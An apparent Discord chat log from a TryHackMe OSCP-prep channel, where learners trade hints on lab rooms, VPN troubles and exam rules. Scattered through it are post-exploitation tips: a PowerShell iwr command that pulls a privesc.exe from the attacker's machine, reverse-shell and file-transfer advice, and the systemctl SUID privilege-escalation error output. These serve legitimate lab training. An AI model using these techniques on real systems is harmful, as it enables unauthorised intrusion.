#offensive-pentesting-path

1 messages Β· Page 5 of 1

desert bloom
#

also, on the question " What user was running the web server?" did anyone find that confusing? I eventually figured it out, but, I took that question to mean who owned the running process...probably overthinking it

rigid gyro
#

yeah i had to submit a few πŸ˜„

crimson flame
#

Side note, I'll need to make a part 2 for that room whenever I can get GMON to work

hidden rivet
#

Anyone else having the issue where the "Proving It" category shows as unfinished even though all the rooms are 100% in that section?

spark iron
#

Can you send a screenshot?

hidden rivet
#

Want a DM of it?

slim flower
#

Anyone got issue with VPN today? I am not able to ping machines

chrome valve
#

Been fine for me @slim flower
Are you using Linux?

slim flower
#

Kali on my Vmware, windows on my Vmware and also tried tryhack kali machine (online one)

chrome valve
#

Mind switching over there?

slim flower
#

none of them worked

gentle glade
#

@spark iron are you available for a issue i am experiencing with hackmountain

hasty sentinel
#

drop me a DM @gentle glade :))

fathom rapids
#

hi all, I just finished kenobi but I m missing something in priv esc. someone who can give me some explanation?

chrome valve
#

@fathom rapids If you DM me with what you did, I'll explain it to you

normal sluice
#

Anybody having any issues with getting HackPark to deploy?

plucky cedar
robust loom
chrome valve
#

Might be worth mentioning which room that is @robust loom

robust loom
#

Updated πŸ™‚

toxic temple
#

I think that's Spopy's room, and it's being fixed atm

robust loom
#

@toxic temple it is but he said to "speak" to skidy πŸ˜‰

honest jackal
#

Hello all anyone rooted Alfred without meterpreter?

#

I'm trying with powersploit

#

No chance there

weary briar
#

Question everyone. In OSCP, if one buys the course, do you own the training material and videos, and is it possible to review again after subscription expires? Or if review is necessary, do I need to buy the course again?

#

Sorry, I need to clarify. I am talking about the OSCP material.

spark iron
#

Oh

#

Gotcha

weary briar
#

πŸ˜†

toxic temple
#

Yes, you can download the course PDF, and view the videos (maybe download them? I'm not sure on that one)

#

You own them as they have your name plastered all over them

weary briar
#

OK, that's good. Just like Cisco ebooks, they have my name on them. Perfectly OK with that since I wasn't planning on sharing it!
I am doing the ePTS (along with THM) and eLearn allows me to read and view the videos offline. i wanted to know if OSCP is the same way.

ebon basin
#

Ahh name is on it

#

I was wondering why PWK pdf hasnt been leaked lol

toxic temple
#

Yeah

#

It has your name, student ID and other stuff on it, so they can trace it back pretty easily

rigid gyro
#

so i found a mistake, i ran nmap with -p- on kenobi and found X number of ports, the room expected Y number of ports, I could not have guessed without looking at the hint for the limited command that was expected i run. that being said, this is awesome and affordable and thank you

burnt walrus
#

@weary briar yea they give out all the materials offline

honest jackal
#

Hello all anyone rooted Alfred without meterpreter?
Anyone?

frail vine
#

so i found a mistake, i ran nmap with -p- on kenobi and found X number of ports, the room expected Y number of ports, I could not have guessed without looking at the hint for the limited command that was expected i run. that being said, this is awesome and affordable and thank you
@rigid gyro i found a few of the port questrions had different results....

#

i did however mis-read one of them

rigid gyro
#

yeah some few things herer and there, but overall i am very pleased, just needs a little polish

robust loom
#

there is one question regarding num of open ports in Brainstorm which doesn't take the correct number

rigid gyro
#

you stalking me @robust loom πŸ˜‰

#

jk buddy

robust loom
#

u know I am MAD

#

ehm you're mad πŸ˜‰

rigid gyro
#

there you go

desert bloom
#

just finished kenobi - very cool little lab

dense mural
#

Hey ! Just enrolled into the OSCP path (& Tryhackme in general), passed the first room quite easily ^-^ Anyone who passed OSCP can testify of how usefull the path was ? I have 10 weeks to prepare & took a 2 months lab but I'm a nervous kind

final vault
#

If you’ve already booked the path is useful but pwk labs will do you better as they are the official labs for oscp

dense mural
#

Yeah sure, I don't expect the path to "replace" the actual training

frail vine
#

the path is a good aid to get people moving. it's more guided than the PWK is

glass saddle
#

yes i can echo the goodness.....i just spent three months in the PWK lab and it was nice to rejog the memory on some things before my exam....the VMs keep crashing on me though....its really frustrating. Don't think the servers are capable of the increased load thats been put on them recently with the rapid growth of the platform. Put in a feedback ticket and the CEO emailed me directly and promptly....which was very cool.. The issue hasn't been resolved but its nice to know that my feedback went noticed at all. kudos on the customerservice piece. Carries a lot of weight imo.

spark iron
#

If you’ve already booked the path is useful but pwk labs will do you better as they are the official labs for oscp
@final vault Oh nice dude, did Nick give in and purchase it for you?

final vault
#

I wish 😭

strong jetty
#

Did anyone find the root.txt file on Alfred?

haughty relic
#

anyone have any resources on uploading files via netcat once I have a reverse shell established? Trying to avoid meterpreter

chrome valve
#

Once you've got a reverse shell there are a bunch of ways you can do it @haughty relic. Can you use wget?

haughty relic
#

hmm let me see

#

nah

#

the problem is that my target is windows

chrome valve
#

Ah. Curl should be installed by default on Windows

#

Try it?

haughty relic
#

hmm nope no curl either

chrome valve
#

Which box is it? I'll check my notes and see if I've done it

fleet wedge
#

You can use nc to receive files

chrome valve
#

That... would be the obvious solution. Ta @fleet wedge πŸ€¦β€β™‚οΈ

strong jetty
#

or powershell

cobalt sigil
#

I'm having some issues with gamezone

fleet wedge
#

Yeah powershell iwr would work to

cobalt sigil
#

it sometimes freezes the connection and gets my ssh stuck

haughty relic
#

yeah no nc

#

i will look into powershell tho

fleet wedge
#

Is your attacker a linux box @haughty relic

haughty relic
#

ya

#

kali

fleet wedge
#

You can host files using SimpleHTTPServer

#

And use powershell iwr <your ip>/<file> -OutFile <what you want to save the file as>

haughty relic
#

ok, cool. Thanks for that, super useful

fleet wedge
#

Something like powershell iwr 10.10.10.10/privesc.exe -OutFile privesc.exe

#

Np :)

haughty relic
#

my windows game is super weak

fleet wedge
#

Yeah it helps to know some powershell commands

haughty relic
#

awesome ty

#

will check it out

haughty relic
#

aaah powershell iwr is successfully hitting my webserver, server is registering a call, returning 200, but for some reason the file isnt presetn on the windows box afterwards

#

anyways not asking for help, just venting lol

fleet wedge
#

Do you have write perms to the directory you're in @haughty relic

#

If you don't have write perms it won't save

haughty relic
#

yeah that was my thought, trying to figure out windows permissions rn

#

icacls

fleet wedge
#

You can do echo test > file

#

Then check if the file is there

haughty relic
#

ty, will try that

haughty relic
#

figured out what I need btw

#

got root right when my machine expired before I could get the flag tho so I just took a break lol

#

this machine has been killing me all day

#

god help me on oscp

haughty relic
#

finally done with hackpark

#

what a journey

fleet wedge
#

Good job! @haughty relic

final vault
#

I just hit lucky, think I'm paying for oscp and starting it asap

toxic temple
#

Bounty?

final vault
#

Yeah

toxic temple
#

ayy

final vault
#

Really wanna get disclosure for this but doubt I will

toxic temple
#

h1?

final vault
#

yeah

toxic temple
#

gl on that one kekw

final vault
#

5k critical

#

Yeah they're terrible for disclosure

toxic temple
#

Can't wait for the "Marked as duplicate" 2 days later

final vault
#

No I mean it just went through to triage

#

waiting on payment now

toxic temple
#

Ah

#

You got lucky then

final vault
#

Yeah I'm not sure I believe this yet

#

I was literally about to go to sleep as I hadn't heard anything

#

and have work in like 5 hours

rigid gyro
#

is harkpark a bit unstable?

terse herald
#

Fingers crossed @final vault that's a mighty nice find if so!! gratzz

final vault
#

Yeah waiting on payment to clear and I’ll be jumping onto the oscp hype train

toxic temple
#

You could book OSCE at the same time kekw

final vault
#

Think I’ll fail oscp before I go for failing that too

toxic temple
#

I've considered getting the one before OSCP as a meme

#

KLCP or whatever it's called

haughty relic
#

morning all

toxic temple
#

o/

haughty relic
#

Anyone working on steel mountain rn?

desert bloom
#

Hackpark is one @#$%#$%!@ frusrating box...if this is anything like oscp I am doomed 😫

desert bloom
#

I can get as far as a windows shell using the exploit but get completely stuck on transfering files over to the windows host via netcat session. When I think I've maybe uploaded the file I suddenly start seeing incessant scrolling like this and can't get anything done:

#

I then have to redeploy and bang my head at this point again

haughty relic
#

just finished hackpark yesterday

#

i used powershell rather than netcat

#

just finished steel mountain! πŸ˜„

fleet wedge
#

You on a roll @haughty relic

desert bloom
#

I've also seen mentions of powershell, but, how are folks leveraging it for hackpark?

#

nm I think I see

#

BOOM

fleet wedge
#

You do it @desert bloom?

desert bloom
#

yep - had to find a writable directory πŸ™‚

fleet wedge
#

Good job!

desert bloom
#

thanks!

fleet wedge
#

@desert bloom you get a shibe of encouragement

haughty relic
#

haha ty

#

anyone have a hint for guessing the password on alfred?

haughty relic
#

figured it out, definitely learning some painful lessons but hopefully will get better and bertter

fleet wedge
#

The pain means that you're learning! @haughty relic

desert bloom
#

took copious notes on HackPark - it was worth the frustration, but, walking away from it for 3 hours helped!

desert bloom
#

Only lingering question was Task 4, Q 3. I made a really good guess on the answer, but, if anyone can help me understand was was 'abnormal' about that service, I'd love to know the correct way to determine that. Finished the lab and my brain is tired. good night!

maiden aurora
#

Sheeeb

autumn field
#

Hi All, has anyone here done Buffer Overflows room, have a quick question regarding task8

hard shoal
#

Im attempting them now

#

I got so far on the second one but got stuck on the first one.

short jacinth
#

OFFSEC security updated their OSCP exam and it looks like Metasploit is on the syllabus. Is Metasploit still banned for the OSCP exam?

hard shoal
#

I don't think the Exam has been updated only the course material. As far as I am aware the rules still apply about the usage of Metasploit in the exam.

hasty sentinel
#

we'll be updating the OSCP path to change the use of metasploit to suite the syllabus more

haughty relic
#

thank you, i did notice that a lot of the labs ask you to use meterpreter/metasploit. It would be nice if the manual exploit was explained as well since we can only use msf/meterpreter once in the exam

haughty relic
#

anyone here complete alfred manually or did yall use metasploit?

final vault
#

Have to agree on that. Don’t get people into bad habits with the path or it may backfire on some people

toxic temple
#

Probably a result of backporting standalone rooms for the path

rancid canyon
#

@autumn field did you figure out task 8? i'm stuck

autumn field
#

@rancid canyon same. since yesterday haven't done much. I think I'm missing out something, during the debugging I see that the instructions are executed, but during the run-time it still segfaults. I'm using gdb with unset variables.

rancid canyon
#

i can get a shell without segfaulting but it doesn't do what it needs to do

autumn field
#

in my case, when a provided payload syscall instruction is executed (during debugging) nothing happens and it continues executing the instructions until it bumps into AA..'s , so I thought if the address is correct, during the run-time it bumps into AA..'s. However if the address is wrong, then it fails because I'm pointing to a wrong location. I'm trying to figure out whether I'm actually using correct address :)) Will look into it again in few hours

rancid canyon
#

If you're segfaulting it probably means your return address is wrong (assuming your shellcode is valid). I found a script that helps keep the env consistent when invoking the program with and without gdb, that way the return address you find in gdb will work when running without gdb. DM me if you want that hint.

minor oyster
#

some one can help with alfred machine?

hard shoal
#

@minor oyster What are you stuck on ?

minor oyster
#

but , where do you find the flag

#

I don't find in C:\windows\system32\config

hard shoal
hidden rivet
#

@minor oyster try migrating processes. Even if you're NT SYSTEM, that process itself may not have full privs

grave patio
#

Hackpark is so frustrating. I cant get my meterpreter shell transferred. This box is so borked πŸ™„πŸ™„

hidden rivet
#

What bit ya stuck on?

grave patio
#

Getting an upgraded meterpreter shell. I FINALLY got the shell.exe transferred over to the windows box and now it just wont execute. I have the meterpreter listener running on my machine, but the meterpreter payload that I transferred to the victim machine just doesnt do anything with I try to execute it

hidden rivet
#

Feel free to DM me too if you wanna provide screenshots of what you've tried and what's not working

hasty sentinel
#

@everyone
sorry for the massive ping - we want to collect feedback on the path. We know that various rooms have had particular issues and we want to aggregate those issues and fix the rooms as quickly as we can. We'll be releasing a better way for keeping track of issues on room (but we'll use this for now)
Please take a few minutes to fill in this feedback form:
https://forms.gle/HeN5BgaKXrkJnaL49
We'd also love to hear your thoughts about the OSCP pathway in general and how it has/hasn't helped you
btw: we're also giving $50 (randomly allocated) to someone who completes the survey
If you have more comments, feel free to get in touch with me πŸ™‚

gritty jungle
#

i can fill after oscp exam ty

fleet wedge
#

Freak off 😠

toxic temple
#

Um, @hasty sentinel , how do you plan on getting a hold of people who fill out the form?

north quail
#

yeah lol

hasty sentinel
#

GOOD POINT OOPS

#

adding that in now

chrome valve
#

Haha! 😁

fleet wedge
#

Lollll

hidden rivet
#

Wish there was an option of β€œdid not take exam”. Now you’re getting an answer saying the path didn’t help me haha

fleet wedge
#

Ahsu when will you add a profile picture

north quail
#

that question is optional

hidden rivet
#

Oh, derp. Well sorry for the bad addition to the stats

hasty sentinel
#

added

toxic temple
#

capital w reeeeeeeee

hasty sentinel
#

aha i'm not sure what to put for my profile picture

chrome valve
#

A profile picture, or the question @hasty sentinel? 😁

#

Right, we gotta find Ashu a profile picture. Shibe @fleet wedge?

hidden rivet
#

So should the form be filled out a second time if you filled it out without the question of your username?

#

I guess only if I want a chance for the $ yeah?

hasty sentinel
#

fill it out again just in case

#

OMG SHIBES!!

chrome valve
toxic temple
#

What about Wallace from Wallace and Gromit

chrome valve
#

Or Gromit from Wallace and Gromit?

hasty sentinel
#

what's that hmm

fleet wedge
#

@chrome valve ofc

#

@hasty sentinel you want a shibe pfp?

chrome valve
#

@fleet wedge Please, please, please add a !shibe into the bot...

fleet wedge
#

I'll add a !spaniel too

chrome valve
#

Yes!!

#

Gotta make sure that there's nothing weird on Google Images first...

terse herald
#

quickly adds something weird

fleet wedge
#

I think it'll work

#

Where I have a bunch of spaniel.pics

#

In a dir

#

And the bot chooses a random one

chrome valve
#

Aye, that's the safe option...

fleet wedge
#

I dun trust google images πŸ˜‚πŸ˜‚

chrome valve
#

I need to take a look at the bot code actually. Never tried Discord botdev. Might setup a server just to give it a shot 😁

#

Uh, yeah, point...

fleet wedge
#

@restive hamlet u got any shibe pics?

terse herald
#

@chrome valve It is scarily easy. Never touched the API and made an UwU-ifier in <30 minutes at a workshop at a hackathon

fleet wedge
#

Yeah discord libs are really really easy

chrome valve
#

Hmm. Definitely worth looking into then 😁

fleet wedge
#

If you know python you can do just about anything

chrome valve
#

Might look at the TryHackMe bot. It's on Github right?

fleet wedge
#

Mhm

chrome valve
#

First language 😁

fleet wedge
#

You want the bot-dev role

chrome valve
#

That an offer or a statement? πŸ˜„

fleet wedge
#

Yes

terse herald
#

lmao

fleet wedge
#

😁

chrome valve
#

That... didn't answer the question πŸ€¦β€β™‚οΈ 😁

fleet wedge
#

Well

#

Put it this way

#

You have the role now

#

@chrome valve

terse herald
#

woah

chrome valve
#

Well, that works too πŸ€·β€β™‚οΈ
Thanks Pars. I'll go have a look

terse herald
#

Proves if you don't ask you don't get lmao

chrome valve
#

I didn't ask...
Still got 😁

terse herald
#

all you gotta do now is submit a PR fixing one whitespace or something

#

just make sure you leave enough grammar mistakes for the rest of us to fix :^

restive hamlet
#

@fleet wedge no?

fleet wedge
#

Dm mar and get.me.some shibes pls @restive hamlet

#

:)

restive hamlet
#

Why don't you

fleet wedge
#

Uh

desert bloom
#

Steel Mountain Done...wondering if I should have done the easier rooms in the "proving it" section first before trying Hackpark πŸ€”

fierce thunder
#

anyone web pentesting professional?

fleet wedge
#

A little bit

#

I never call myself professional πŸ€”

orchid jasper
#

hey anyone can help me with hackpark? just have some questions πŸ™‚

fathom rapids
#

hey anyone can help me with hackpark? just have some questions πŸ™‚
@orchid jasper I complete it except for the question 4, task4. so fell free to ask me anything

fathom rapids
#

mmm anyone who completed Steel Mountain can clarify one point to me?

hot shoal
#

hey all, new member here, starting oscp labs Saturday (3rd attempt), htb member. anyone else get here from John Hammond's vids? lol

fleet wedge
#

hey all, new member here, starting oscp labs Saturday (3rd attempt), htb member. anyone else get here from John Hammond's vids? lol
@hot shoal i don't have money enough for take the course haha

hard shoal
#

Has anyone done the OSCP Path and did it help with the OSCP exam ?

normal knoll
#

My exam is in a month and I am about 50% through the path right now, i will let you know lol

alpine peak
#

@hard shoal Do the path without ever looking at a writeup, and you have a high chance

#

Also don't use metasploit ever

hard shoal
#

Cool thanks

shell yarrow
#

I did OSCP exam twice. This is really helpful!

#

@hard shoal

hard shoal
#

Got my exam soon so anything that help me prep is awesome.

normal sluice
#

I didn’t complete the OSCP path, but I start PWK labs this Saturday.

alpine peak
#

nice!

fleet wedge
#

@normal sluice good luck!

glass saddle
#

@grave patio try certutil ....worked for me...i didn't use meterpreter

#

though

fleet wedge
#

Pm if need help for hackpark any1

alpine peak
#

sure @fleet wedge

haughty ruin
#

I am trying to start hackpark but I can not access it. Not even after waiting 5 minutes.

#

nevermind, I was to impatiant i guess, I got a connection now

fathom rapids
#

Pm if need help for hackpark any1
@fleet wedge01#3602 dm me, I completed it except for task 4, question4

#

sure @fleet wedge
@alpine peak did you answer to question 4, task 4?

spark iron
#

I am trying to start hackpark but I can not access it. Not even after waiting 5 minutes.
@haughty ruin You should do, are you connected to the VM?

fathom rapids
#

gamezone.
trying to crack the hash I receive this output: No password hashes left to crack (see FAQ)
do you know why

fleet wedge
#

any linux masters here

chrome valve
#

What do you mean by linux master @fleet wedge?

#

If you've got a (relevant) question, feel free to just stick it in the chat.

fleet wedge
#

I dont know how to solve a mission in linux

#

and my ssh connection is not working anymore through putty?maybe anyone ca check ?

spark iron
#

Are you defo connected?

#

Do you have two VPN's running?

#

Is the machine still alive and up?

fleet wedge
#

nope

#

the machine got disconnected

#

and i am only using openvpn

spark iron
#

Deploy that room and access the web server

#

Just to double check its not you πŸ™‚

fleet wedge
#

its not starting after clicking on deploy

spark iron
#

Try refreshing the page

fleet wedge
#

its the same issue as yesterday ,machine is not booting up

spark iron
#

please try again

#

I am watching our logs

fleet wedge
#

ok

#

i clicked once again on deploy

spark iron
#

And it just hangs nothing happens?

fleet wedge
#

only if i may have any other open sessions

spark iron
#

Hm, strange.

#

Do you already have a machine running in that room?

fleet wedge
#

nope

spark iron
#

Whats your THM username?

fleet wedge
#

xande30

spark iron
#

Could you access the OpenVPN machine?

#

I can see you have that running atm

fleet wedge
#

its on

spark iron
#

Can you access the machine you deployed in the OpenVPN room?

fleet wedge
#

no

#

its not booting up

spark iron
#

Its showing me that the machine is running

#

Refreshthe page

#

Under the graph, there should be a red box that says "Active Machine Information"

fleet wedge
#

its on maybe

spark iron
#

So go to 10.10.24.61

#

In your browser

fleet wedge
#

done

#

i got the flag πŸ™‚

spark iron
#

Does it display?

#

Ah okay cool

#

Then you are connected to our network

#

Cool

fleet wedge
#

yep

spark iron
#

And what other room wont let you deploy?

fleet wedge
#

let me try once again ,i see the ip changed

#

nope its not working

#

i need to perform this task

#

not working

spark iron
#

are you sure the ip is 10.10.10.10?

#

shiba1?

#

Who is that?

#

Screenshot the red "Active machine information" under the graph for this room

#

10.10.10.10 doesn't exist

#

You need touse the IP given to you in the Active Machine Information

fleet wedge
#

ok

spark iron
#

Screenshot the red "Active machine information" under the graph for this room

#

Please do this ^^

#

ah ok

#

so the ip is

#

10.10.24.61

#

are you sure the username is correct?

fleet wedge
#

thats the one i chose

spark iron
#

You can't choose a username, it has to be on that is set up

fleet wedge
spark iron
#

ah ok, my bad

#

Can you link me the room please?

#

I thought you were doing another room

fleet wedge
chrome valve
#

@fleet wedge that room is funny with PuTTY

#

When you connect to it, try just putting the IP in then clicking enter

fleet wedge
#

it worked a whil ,then it just disconnected me

chrome valve
#

It will prompt you for a username afterwards.

#

Huh, that, is more unusual

fleet wedge
#

i tried both ways

#

none of them is working

fringe pasture
#

theres no deploy option

#

for room

#

?

#

its a free room

#

wheres the ip and deploy ?

spark iron
#

Does the room have a machine to deploy?

fringe pasture
#

idk

#

its learn linux zth

#

i cant find deploy option as the questions we need to interact with the machine

spark iron
#

On task 1

#

Its on task 1

fringe pasture
#

yes

#

i skipped it xdd

#

tqsm

spark iron
#

πŸ™‚

fringe pasture
#

hey in that the last one do i have to do the priv esc ?

#

like linpeas... ?

#

@spark iron

chrome valve
#

@fringe pasture Is this zthlinux?

fringe pasture
#

yea

terse herald
#

All the commands you need to find the flag are in the room - no priv esc necessary πŸ™‚

fleet wedge
#

Mhm

chrome valve
#

Yes, you need to do a privesc (of sorts) but it's not a vulnerability per se

#

All the tools you need are already in the room

fringe pasture
#

like linpeas ?

chrome valve
#

Nope

fleet wedge
#

No

#

The text of the task says

chrome valve
#

Literally just what Pars was teaching you

fleet wedge
#

Everything you need is in that room

fringe pasture
#

yea they say the flag is /root/root.txt

fleet wedge
#

Mhm

fringe pasture
#

which gives perm denied

fleet wedge
#

Mhm

#

You have to use your other tools to get access to root

chrome valve
#

Think laterally, @fringe pasture. You can't get it directly, so look for other things first

fleet wedge
#

But that doesn't mean it's a conventional priv esc

fringe pasture
#

k so im as user shiba4 from there we need to get the root or is there anyother acc ?

chrome valve
#

Are there other accounts?

#

You tell us

fleet wedge
#

@fringe pasture what you need was actually mentioned in a task in the room

#

So if you're completely in doubt you can go back through some of the tasks :)

fringe pasture
terse herald
#

And those different users will have different permissions to certain things right? Like in the tasks you've completed

chrome valve
#

Mmhmm, so go exhaust every possibility. You've not tried those accounts, so try to get into them πŸ˜„

#

And yeah, all the tools you need are taught in the room. Linpeas doesn't do anything (been there, tried that)

terse herald
#

^^

fleet wedge
#

Lol

chrome valve
#

Put it this way. You're enumerating just now, so which of those tools are best at looking for stuff

fringe pasture
#

find, grep

#

locate

fleet wedge
#

There ya go

chrome valve
#

Mmhm. Happy hunting!

fleet wedge
#

@fringe pasture please don't randomly dm members

#

That is a violation of rule 1

chrome valve
#

!rules

frank troutBOT
#
TryHackMe
Rules
1.

No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs.

2.

No personal drama or drama from any other discord community is allowed to be brought into this discord. This is a space for infosec discussions and learning, keep it that way.

3.

No excessive self promotion. Linking to another discord server is strictly prohibited, just don't turn it into advertising.

4.

Keep it civil. If action is necessary in a dispute or any other sort of disruption on this discord punishment will be doled out evenly both to the individual(s) who started the issue and to those who reacted inappropriately in their response.

5.

No cheating is allowed whatsoever within this discord. Any cheating (other than specifically within a developmental environment where it has been preapproved by staff) will result in an immediate and permanent ban.

6.

Racism is not tolerated and will result in a permanent ban.

7.

Administrators reserve the right to modify the rules at any time and extend them accordingly to cover infractions which may not be currently included in these rules.

8.

Keep conversations SFW (Safe for work). This is an educational and professional environment, be sure that your words do not offend or make other members uncomfortable.

chrome valve
#

Does that work?

fleet wedge
#

If you want to get some help in dms please ask the members if you can dm them

chrome valve
#

Oooh, that works

terse herald
#

handy to know that works

chrome valve
#

Yep

fleet wedge
#

Mhm

long pendant
#

Put it this way. You're enumerating just now, so which of those tools are best at looking for stuff
@chrome valve @fringe pasture Can anybody DM to help me with the last step? I feel like I'm close but... still stuck.

chrome valve
#

DM with what you've tried so far @long pendant

long pendant
#

DM with what you've tried so far @long pendant
@chrome valve Thanks all for the help.

fleet wedge
#

hi

#

anyone can help me with this task ?

#

[Task 21] Binary - shiba2

#

from Linux Room

chrome valve
signal pumice
#

I'm working on the blue box, I've run ms17-010 before but its failing. I ran it yesterday on the box but my VPN connection dropped so i lost shells, Now I can't fire the exploit again?

#

Should I be running it manually?

spark iron
#

There is a video for Blue coming soon

#

Which will help

#

Its just going to be edited

signal pumice
#

Ah nice one

#

Just strange how it worked first time and not now :P

spark iron
#

Yeah Blue is a little dodgy

#

Will be made clear once "Known Issues" have been added to THM Room tabs:)

fleet wedge
#

How many machines are on the OSCP path ?

steel mural
#

Is it the same issue for everyone?? Like the connection just drops when you try to load the post module?

burnt agate
#

yh, i managed to get past it tho

#

regen the vpn and reinstall

steel mural
#

Thanks will try :)

fleet wedge
#

@spark iron hi

spark iron
#

hi

fleet wedge
#

@spark iron how many machines are in the OSCP Path please ?

spark iron
fleet wedge
#

That's amazing πŸ‘ thanks

spark iron
#

No worries

fleet wedge
#

@spark iron will be taking it after my Virtual Hacking Labs

spark iron
#

Awesome nay worries

fleet wedge
#

πŸ‘

brittle gazelle
#

hey

fathom rapids
#

hi guys, is there someone who completed gamezone?

hard shoal
#

Ive completed most of the OSCP labs are there any other that are worth doing ? got my exam coming up soon so trying get in as much practice as possible.

fleet wedge
#

@hard shoal oooo

#

Good luck!

#

You can try some of @chrome valve's rooms

chrome valve
#

Hehe. Annoying though they are, are they really helpful for OSCP? πŸ˜›

fleet wedge
#

Theyre useful for research practice

chrome valve
#

If you're after some fun, go try them though @hard shoal -- admittedly, I'm biased 😁

#

True...

fleet wedge
#

As they offer some how shall we say

#

"unusual" techiques

hard shoal
#

Cool will take a look

chrome valve
#

You're not wrong there πŸ˜†

fleet wedge
#

howdy

#

practicing burp using OSPCP learning path... but no matter what I do, "intruder" does not work or not able to identify the proper extension

#

can someone help me?

#

I am using "sniper"

final vault
#

if you're only testing for .phtml and it's wrong then maybe it won't return anything

#

I assume this is an upload too right?

#

Unless you know for certain it's .phtml in which case you can just upload a phtml file

fleet wedge
#

hi there

#

well, the exercise is to find acceptable extensions

#

I already know the acceptable extension (not using burp) but can't make burp to work

#

that's actually the right extension, I just deleted the previous file to troubleshoot and leave that one, still does not work

fleet wedge
#

Fixed! the "URL encode" option was my problem. I unchecked that and it worked

fathom rapids
#

hola guys, I started skynet. the hint is ||to enumerate samba|| but if I didn't see the hint, Idk how can we know we have to enumerate for that. nmap shows only a ||port 53 tcp open||

#

any advice?

final vault
#

You may if nmapped before all services are open

fathom rapids
#

what do you mean

final vault
#

Rooms take a while to setup

#

So if you ran your port scan early it may not show all results

brazen tiger
#

Hi

#

Not able to find root.txt on the indicated directory for alfred box

#

Normal?

fleet wedge
#

I have not worked on that one yet, but how are you looking for? via "locate" command?

#

if that's the case, run upatedb to refresh the database

#

or try find / -iname root.txt

hasty sentinel
#

@brazen tiger you need to migrate to a system process

fleet wedge
#

I'm stuck on the priv escalation part of Vulnversity

#

Have you found the special binary @fleet wedge

#

I know I can execute a given file with elevated priv

#

Have you found that file?

#

got a low priv shell

#

Yes, I know is one that has suid

#

Then you should research

#

How to priv esc using that binary

#

Infact

#

The THM bot has a command that can help you 😁

#

I did, created the file that suppose to give me root but nothing

#

hmmm

#

Play around with what you're told to do

#

THM bot?

#

||are you using GTFO bins||

#

sorry, no idea what is that

#

It's a site that gives you information on how to priv esc using certain binaries

#

argh... lost the shell .. ... and IP vanished

#

the machine went off... this is the 2nd time it happened

fleet wedge
#

I guess I will leave it for today... still stuck on priv escalation for vulnversity

#

part of the problem is that I can't even use nano. And even when creating a file with "echo", the file does nothing after I try to execute and get a root shell

#

😩

#

Why can't you use nano

#

@fleet wedge

#

I get an error

#

$ nano test.txt
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

#

Ye

#

But you can still use it

#

Do you have a proper shell or a reverse shell

#

well, I don't know how

#

I have a low priv shell

#

I just need a root shell

#

Reverse or proper tho

#

reverse after uploading a file to the webserver

#

Then I recommend

#

Downloading a static binary of socat

#

Onto the server

#

And using that to get a shell

final vault
#

could always just create a python pty shell

#

upgrade into full interaction

fleet wedge
#

Yeah but that's still iffy with nano @final vault

#

Socat just works

#

And that's what I like about it

#

could always just create a python pty shell
@final vault did that, still nano does not work

final vault
#

could always just make it on your machine

fleet wedge
#

An option^

#

an upload via nc?

#

not sure if that's a spoiler

final vault
#

You have curl and wget I assume

fleet wedge
#

have not checled

#

I guess

#

I will try to use nc or python webserver and upload

#

maybe tomorrow, I am tired... but am I on the right dirfection?

#

Yeah take a break for now

#

You've got the right idea

#

Maybe some sleep will clear the head

#

9pm here... agree.... time to play some PES2020

#

LOL

#

Thank you all!

#

Cheers

#

<3 @fleet wedge

obtuse scaffold
#

If you can't get a shell back, upload a suid C program and use the exploit to change the owner and suid to root

#

I couldn't seem to get a working shell from systemctl exploit so had to do that

fleet wedge
#

.sudo_as_admin_successful -why i cant view this file

fleet wedge
#

@fleet wedge what’s your question , exactly?

#

DM me if you still need help

#

No

#

I finished the room

fleet wedge
#

Good job

fathom rapids
#

can someone clarifies me a thing on burp's sniper attack?

glad silo
#

@fathom rapids wat kind of questions do yo have

#

Can I get hint on "What file server is running?"... I know the name of the service, but wat they need me to fill in there πŸ€¦β€β™‚οΈ

#

Steel Mountain

#

Also name of the server πŸ™‚

glad silo
#

@fleet wedge maybe you can help me with this question?

fleet wedge
#

@glad silo are you providing the name of the protocol or the name of the service

glad silo
#

I'm providing Server Name with Protocol as the first word πŸ™‚ I know that I'm missing something here, can't figure out what... 😦

fleet wedge
#

DM me your answer @glad silo

fleet wedge
#

What's the purpose of upgrading the shells in metasploit in task#3 , for "Blue" ?

#

I did it but I don't see the point. Does not the initial Windows shell that was obtained runs on a high privilege? Why we need to create a 2nd session again? Maybe I misunderstood the exercise or I'm missing something

blissful nest
#

I am stuck on priv escalation of Vulnersity :/
after 4 hours, I gave up and followed write ups, but I keep getting this below error
www-data@vulnuniversity:/opt$ /bin/systemctl enable --now $priv
/bin/systemctl enable --now $priv
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.rkdS8byk8r.service to /tmp/tmp.rkdS8byk8r.service.
Failed to start tmp.rkdS8byk8r.service: Unit tmp.rkdS8byk8r.service is not loaded properly: Invalid argument.
See system logs and 'systemctl status tmp.rkdS8byk8r.service' for details.

fleet wedge
#

@blissful nest do you understand why and how you need to elevate the priv ?

#

Feel free to PM me if you still need help with vulnersity

fallen herald
#

for vulnversity did anyone else not have access to the website? gobuster scan was fine, i have a connection but when i enter IP in the browser, im unable to connect. My session is still running and everything

#

I'm using the provided Kali 2020 box over RDP

lofty kite
#

I'm having trouble just scanning it

narrow nexus
#

How long does Ospc path last?

lofty kite
fleet wedge
#

@fallen herald be sure the VM is up and running . And be sure you’re using the right port / socket when typing the url

#

@lofty kite check nmap flags. If the VM is up and running , nmap will work just fine . But sometimes you gotta adjust nmap flags .

blissful nest
#

scripts like lse.sh or similar ones are allowed on OSCP exam?

final vault
#

Yes

fleet wedge
#

@blissful nest You can use whatever as long as its NOT a commercial tool or automate the exploitation process

grave patio
#

has anybody done the gamezone box manually when it comes to privesc?

fleet wedge
#

@narrow nexus each phase / step has an estimated amount of Hours you’ll have to invest. But if it will take more or less , I guess will depend of your commitment and expertise

#

I personally try to not rush the process so I can learn

jagged socket
#

@blissful nest you should try linpeas ;)

blissful nest
#

looks really awesome

#

thanks @jagged socket

#

I am beginner, here for such cool tips/tricks

#

@fleet wedge thanks a lot!

jagged socket
#

no problem mate, good luck for oscp! it’s great learning curve

blissful nest
#

it is!!

#

so much to learn!

jagged socket
#

after the overhaul, for sure!

fleet wedge
#

@blissful nest np, enjoy . I’m also completing β€œOSCP path”, so I’ll be around here in case of further questions and I’m sure I may need help too πŸ˜‰

cobalt sigil
#

I need help on alfred, it's constantly timing out

#

even after building the project

